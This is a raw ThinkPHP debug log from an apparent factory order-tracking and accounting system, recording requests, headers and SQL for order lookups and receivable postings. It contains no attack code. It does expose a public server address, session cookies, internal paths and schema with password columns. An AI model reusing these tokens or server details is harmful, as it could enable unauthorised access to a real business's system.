--------------------------------------------------------------- [ 2022-07-20T17:06:11+08:00 ] 106.112.205.110 POST /api/order/getrukuorderbyid?staff_id=97&orderStr=&keywords=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=97&orderStr=&keywords=&offset=0&pageNum=10 [运行时间:0.053332s][吞吐率:18.75req/s] [内存消耗:5,418.84kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=7b02gnlf0v91gae252i70n2c91', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '97', 'orderStr' => '', 'keywords' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001631s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000337s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001506s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001077s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '97' LIMIT 1 [ RunTime:0.000415s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000997s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001045s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.002490s ] --------------------------------------------------------------- [ 2022-07-20T17:06:11+08:00 ] 106.112.205.110 POST /api/order/getrukuorderbyid?staff_id=97&orderStr=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=97&orderStr=&offset=0&pageNum=10 [运行时间:0.055839s][吞吐率:17.91req/s] [内存消耗:5,418.31kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001176s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=7b02gnlf0v91gae252i70n2c91', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '97', 'orderStr' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001730s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000269s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001104s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001068s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '97' LIMIT 1 [ RunTime:0.000392s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001179s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001044s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.002399s ] --------------------------------------------------------------- [ 2022-07-20T17:07:33+08:00 ] 106.112.205.110 POST /admin/financial/verifybill/hedui/ids/1753?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1753?dialog=1 [运行时间:0.189637s][吞吐率:5.27req/s] [内存消耗:6,219.27kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001169s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '591', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1753?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '南', 1 => '170', ), 'verify_amount' => array ( 0 => '4000', 1 => '4000', 2 => '4000', 3 => '4000', ), 'price' => array ( 0 => '3.58', 1 => '1', 2 => '0.06', 3 => '0.06', ), 'money' => array ( 0 => '14320', 1 => '4000', 2 => '240', 3 => '240', ), 'explain' => array ( 0 => '100W-10底壳4000个', 1 => '100W-1上盖4000个', 2 => '大平压板4000个', 3 => '大弯压板4000个', ), 'shoukuan_status-1' => '1', 'shoukuan_status-2' => '1', 'shoukuan_status-3' => '1', 'shoukuan_status-4' => '1', 'ids' => '1753', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001642s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006188s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000527s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001629s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000436s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001013s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001086s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001583s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000333s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001349s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001270s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001544s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001121s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001141s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1753' [ RunTime:0.002790s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=4000,`price`=3.58,`money`=14320 WHERE `id` = 3031 [ RunTime:0.005000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001590s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001212s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (170 , 40 , 6557 , 1103 , 1753 , 3031 , 1 , 2022 , 7 , 20 , '100W-10底壳4000个' , 1658308053 , 14320 , 7784767.82) [ RunTime:0.003982s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001416s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (170 , 40 , 6557 , 1103 , 1753 , 3031 , 1 , 2022 , 7 , 20 , '100W-10底壳4000个' , 1658308053 , 14320 , 7770447.82) [ RunTime:0.005033s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.001562s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000931s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (14320 , -575853.51558402 , 2528 , 5 , '100W-10底壳4000个' , 40 , 20 , 7 , 2022 , 1658308053) [ RunTime:0.005296s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=4000,`price`=1,`money`=4000 WHERE `id` = 3032 [ RunTime:0.005884s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001623s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (170 , 40 , 6558 , 1106 , 1753 , 3032 , 1 , 2022 , 7 , 20 , '100W-1上盖4000个' , 1658308053 , 4000 , 7788767.82) [ RunTime:0.003712s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001503s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (170 , 40 , 6558 , 1106 , 1753 , 3032 , 1 , 2022 , 7 , 20 , '100W-1上盖4000个' , 1658308053 , 4000 , 7780767.82) [ RunTime:0.003758s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001009s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (4000 , -571853.51558402 , 2530 , 5 , '100W-1上盖4000个' , 40 , 20 , 7 , 2022 , 1658308053) [ RunTime:0.005423s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=4000,`price`=0.06,`money`=240 WHERE `id` = 3033 [ RunTime:0.003308s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001510s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (170 , 40 , 6559 , 1021 , 1753 , 3033 , 1 , 2022 , 7 , 20 , '大平压板4000个' , 1658308053 , 240 , 7785007.82) [ RunTime:0.005368s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001384s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (170 , 40 , 6559 , 1021 , 1753 , 3033 , 1 , 2022 , 7 , 20 , '大平压板4000个' , 1658308053 , 240 , 7784527.82) [ RunTime:0.004434s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001089s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (240 , -575613.51558402 , 2532 , 5 , '大平压板4000个' , 40 , 20 , 7 , 2022 , 1658308053) [ RunTime:0.003906s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=4000,`price`=0.06,`money`=240 WHERE `id` = 3034 [ RunTime:0.005026s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001414s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (170 , 40 , 6560 , 1022 , 1753 , 3034 , 1 , 2022 , 7 , 20 , '大弯压板4000个' , 1658308053 , 240 , 7785007.82) [ RunTime:0.004797s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001364s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (170 , 40 , 6560 , 1022 , 1753 , 3034 , 1 , 2022 , 7 , 20 , '大弯压板4000个' , 1658308053 , 240 , 7784527.82) [ RunTime:0.005818s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001156s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (240 , -575613.51558402 , 2534 , 5 , '大弯压板4000个' , 40 , 20 , 7 , 2022 , 1658308053) [ RunTime:0.004464s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001487s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` 